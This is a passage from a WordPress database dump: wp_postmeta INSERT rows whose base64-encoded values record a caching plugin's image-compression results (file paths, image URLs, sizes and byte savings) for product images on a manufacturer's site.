cGhvdG9seXNpcy04MDB4MTE0LnBuZyIsIndpZHRoIjo4MDAsImhlaWdodCI6MTE0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0luaXRpYXRpb25fLV9waG90b2x5c2lzLTgwMHgxMTQucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Jbml0aWF0aW9uXy1fcGhvdG9seXNpcy04MDB4MTE0LnBuZyIsInJlZHVjdGlvbiI6NjY0MiwidGltZSI6MTQ4MzU5MjI3MCwiaWQiOjE2MDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSW5pdGlhdGlvbl8tX3Bob3RvbHlzaXMtNzY4eDExMC5wbmciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjExMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9Jbml0aWF0aW9uXy1fcGhvdG9seXNpcy03Njh4MTEwLnBuZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9wbmciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSW5pdGlhdGlvbl8tX3Bob3RvbHlzaXMtNzY4eDExMC5wbmciLCJyZWR1Y3Rpb24iOjU2MDIsInRpbWUiOjE0ODM1OTIyNzQsImlkIjoxNjAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0luaXRpYXRpb25fLV9waG90b2x5c2lzLTI1MHgxNDYucG5nIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoxNDYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSW5pdGlhdGlvbl8tX3Bob3RvbHlzaXMtMjUweDE0Ni5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0luaXRpYXRpb25fLV9waG90b2x5c2lzLTI1MHgxNDYucG5nIiwicmVkdWN0aW9uIjo5MzIsInRpbWUiOjE0ODM1OTIyNzcsImlkIjoxNjAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0luaXRpYXRpb25fLV9waG90b2x5c2lzLTIwMHgxNDYucG5nIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoxNDYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSW5pdGlhdGlvbl8tX3Bob3RvbHlzaXMtMjAweDE0Ni5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0luaXRpYXRpb25fLV9waG90b2x5c2lzLTIwMHgxNDYucG5nIiwicmVkdWN0aW9uIjo4OTEsInRpbWUiOjE0ODM1OTIyODEsImlkIjoxNjAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0luaXRpYXRpb25fLV9waG90b2x5c2lzLTIyNXgxNDYucG5nIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoxNDYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSW5pdGlhdGlvbl8tX3Bob3RvbHlzaXMtMjI1eDE0Ni5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0luaXRpYXRpb25fLV9waG90b2x5c2lzLTIyNXgxNDYucG5nIiwicmVkdWN0aW9uIjo5MTMsInRpbWUiOjE0ODM1OTIyODQsImlkIjoxNjAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0luaXRpYXRpb25fLV9waG90b2x5c2lzLTUxMHgxNDYucG5nIiwid2lkdGgiOjUxMCwiaGVpZ2h0IjoxNDYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSW5pdGlhdGlvbl8tX3Bob3RvbHlzaXMtNTEweDE0Ni5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0luaXRpYXRpb25fLV9waG90b2x5c2lzLTUxMHgxNDYucG5nIiwicmVkdWN0aW9uIjoyNTI4LCJ0aW1lIjoxNDgzNTkyMjg4LCJpZCI6MTYwMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0luaXRpYXRpb25fLV9waG90b2x5c2lzLTE2MHgxNDYucG5nIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSW5pdGlhdGlvbl8tX3Bob3RvbHlzaXMtMTYweDE0Ni5wbmciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE0NiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Jbml0aWF0aW9uXy1fcGhvdG9seXNpcy0xNjB4MTQ2LnBuZyIsInJlZHVjdGlvbiI6ODM1LCJ0aW1lIjoxNDgzNTkyMjkxLCJpZCI6MTYwMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0luaXRpYXRpb25fLV9waG90b2x5c2lzLTMwMHgxNDYucG5nIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSW5pdGlhdGlvbl8tX3Bob3RvbHlzaXMtMzAweDE0Ni5wbmciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjE0NiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9Jbml0aWF0aW9uXy1fcGhvdG9seXNpcy0zMDB4MTQ2LnBuZyIsInJlZHVjdGlvbiI6OTQwLCJ0aW1lIjoxNDgzNTkyMjk1LCJpZCI6MTYwMn1d'); 
INSERT INTO `wp_postmeta` VALUES (30475, 1362, 'wpfc_optimisation_reduction', '221111'); 
INSERT INTO `wp_postmeta` VALUES (30476, 1362, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMkEucG5nIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yQS5wbmciLCJ3aWR0aCI6NjAwLCJoZWlnaHQiOjYwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzJBLnBuZyIsInJlZHVjdGlvbiI6NzQwMTAsInRpbWUiOjE0ODM1OTIzMDgsImlkIjoiMTM2MiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMkEtMzQweDM0MC5wbmciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yQS0zNDB4MzQwLnBuZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9wbmciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMkEtMzQweDM0MC5wbmciLCJyZWR1Y3Rpb24iOjE4NDkxLCJ0aW1lIjoxNDgzNTkyMzE1LCJpZCI6MTM2Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yQS0yNTB4MjUwLnBuZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzJBLTI1MHgyNTAucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yQS0yNTB4MjUwLnBuZyIsInJlZHVjdGlvbiI6MTAwNTgsInRpbWUiOjE0ODM1OTIzMjAsImlkIjoxMzYyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzJBLTIwMHgyMDAucG5nIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMkEtMjAweDIwMC5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzJBLTIwMHgyMDAucG5nIiwicmVkdWN0aW9uIjo2MzY4LCJ0aW1lIjoxNDgzNTkyMzI0LCJpZCI6MTM2Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yQS0yMjV4MjI1LnBuZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzJBLTIyNXgyMjUucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yQS0yMjV4MjI1LnBuZyIsInJlZHVjdGlvbiI6NzgwNywidGltZSI6MTQ4MzU5MjMyOSwiaWQiOjEzNjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMkEtNTEweDYwMC5wbmciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yQS01MTB4NjAwLnBuZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9wbmciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMkEtNTEweDYwMC5wbmciLCJyZWR1Y3Rpb24iOjQzMDAxLCJ0aW1lIjoxNDgzNTkyMzM5LCJpZCI6MTM2Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzJBLTExNHgxMzAucG5nIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMkEtMTE0eDEzMC5wbmciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yQS0xMTR4MTMwLnBuZyIsInJlZHVjdGlvbiI6MjI0OCwidGltZSI6MTQ4MzU5MjM0MywiaWQiOjEzNjJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yQS0xNjB4MTYwLnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzJBLTE2MHgxNjAucG5nIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMkEtMTYweDE2MC5wbmciLCJyZWR1Y3Rpb24iOjQwMDIsInRpbWUiOjE0ODM1OTIzNDcsImlkIjoxMzYyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMkEtMTgweDE4MC5wbmciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yQS0xODB4MTgwLnBuZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzJBLTE4MHgxODAucG5nIiwicmVkdWN0aW9uIjo1MDkyLCJ0aW1lIjoxNDgzNTkyMzUxLCJpZCI6MTM2Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzJBLTI0N3gzMDAucG5nIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMkEtMjQ3eDMwMC5wbmciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yQS0yNDd4MzAwLnBuZyIsInJlZHVjdGlvbiI6MTE4MzQsInRpbWUiOjE0ODM1OTIzNTcsImlkIjoxMzYyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMkEtMzAweDMwMC5wbmciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yQS0zMDB4MzAwLnBuZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzJBLTMwMHgzMDAucG5nIiwicmVkdWN0aW9uIjoxNDUwNiwidGltZSI6MTQ4MzU5MjM2MiwiaWQiOjEzNjJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yQS00MDB4NDAwLnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzJBLTQwMHg0MDAucG5nIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMkEtNDAweDQwMC5wbmciLCJyZWR1Y3Rpb24iOjIzNjk0LCJ0aW1lIjoxNDgzNTkyMzcwLCJpZCI6MTM2Mn1d'); 
INSERT INTO `wp_postmeta` VALUES (30477, 1360, 'wpfc_optimisation_reduction', '41030'); 
INSERT INTO `wp_postmeta` VALUES (30478, 1360, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvd3A3NjE5YmYzOF8wNi1lMTQ3MzM0ODAzNzg1NS5wbmciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3dwNzYxOWJmMzhfMDYtZTE0NzMzNDgwMzc4NTUucG5nIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC93cDc2MTliZjM4XzA2LWUxNDczMzQ4MDM3ODU1LnBuZyIsInJlZHVjdGlvbiI6MTE1MjksInRpbWUiOjE0ODM1OTIzNzgsImlkIjoiMTM2MCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvd3A3NjE5YmYzOF8wNi1lMTQ3MzM0ODAzNzg1NS0yMDB4MjAwLnBuZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3dwNzYxOWJmMzhfMDYtZTE0NzMzNDgwMzc4NTUtMjAweDIwMC5wbmciLCJtaW1lX3R5cGUiOiJpbWFnZVwvcG5nIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3dwNzYxOWJmMzhfMDYtZTE0NzMzNDgwMzc4NTUtMjAweDIwMC5wbmciLCJyZWR1Y3Rpb24iOjg3MzcsInRpbWUiOjE0ODM1OTIzODMsImlkIjoxMzYwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3dwNzYxOWJmMzhfMDYtZTE0NzMzNDgwMzc4NTUtMjI1eDIyNS5wbmciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC93cDc2MTliZjM4XzA2LWUxNDczMzQ4MDM3ODU1LTIyNXgyMjUucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC93cDc2MTliZjM4XzA2LWUxNDczMzQ4MDM3ODU1LTIyNXgyMjUucG5nIiwicmVkdWN0aW9uIjoxMTQyMywidGltZSI6MTQ4MzU5MjM4OCwiaWQiOjEzNjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC93cDc2MTliZjM4XzA2LWUxNDczMzQ4MDM3ODU1LTExNHgxMzAucG5nIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvd3A3NjE5YmYzOF8wNi1lMTQ3MzM0ODAzNzg1NS0xMTR4MTMwLnBuZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3dwNzYxOWJmMzhfMDYtZTE0NzMzNDgwMzc4NTUtMTE0eDEzMC5wbmciLCJyZWR1Y3Rpb24iOjM1OTcsInRpbWUiOjE0ODM1OTIzOTIsImlkIjoxMzYwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvd3A3NjE5YmYzOF8wNi1lMTQ3MzM0ODAzNzg1NS0xNjB4MTYwLnBuZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3dwNzYxOWJmMzhfMDYtZTE0NzMzNDgwMzc4NTUtMTYweDE2MC5wbmciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC93cDc2MTliZjM4XzA2LWUxNDczMzQ4MDM3ODU1LTE2MHgxNjAucG5nIiwicmVkdWN0aW9uIjo1NzQ0LCJ0aW1lIjoxNDgzNTkyMzk2LCJpZCI6MTM2MH1d'); 
INSERT INTO `wp_postmeta` VALUES (30479, 988, 'wpfc_optimisation_reduction', '278345'); 
INSERT INTO `wp_postmeta` VALUES (30480, 988, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRocmVhZC1zZWFsYW50LnBuZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRocmVhZC1zZWFsYW50LnBuZyIsIndpZHRoIjo0NzgsImhlaWdodCI6NDM3LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRocmVhZC1zZWFsYW50LnBuZyIsInJlZHVjdGlvbiI6MTI2OTY0LCJ0aW1lIjoxNDgzNTkyNDA2LCJpZCI6Ijk4OCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRocmVhZC1zZWFsYW50LTM0MHgzNDAucG5nIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRocmVhZC1zZWFsYW50LTM0MHgzNDAucG5nIiwibWltZV90eXBlIjoiaW1hZ2VcL3BuZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdGhyZWFkLXNlYWxhbnQtMzQweDM0MC5wbmciLCJyZWR1Y3Rpb24iOjI3MzU1LCJ0aW1lIjoxNDgzNTkyNDEyLCJpZCI6OTg4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwv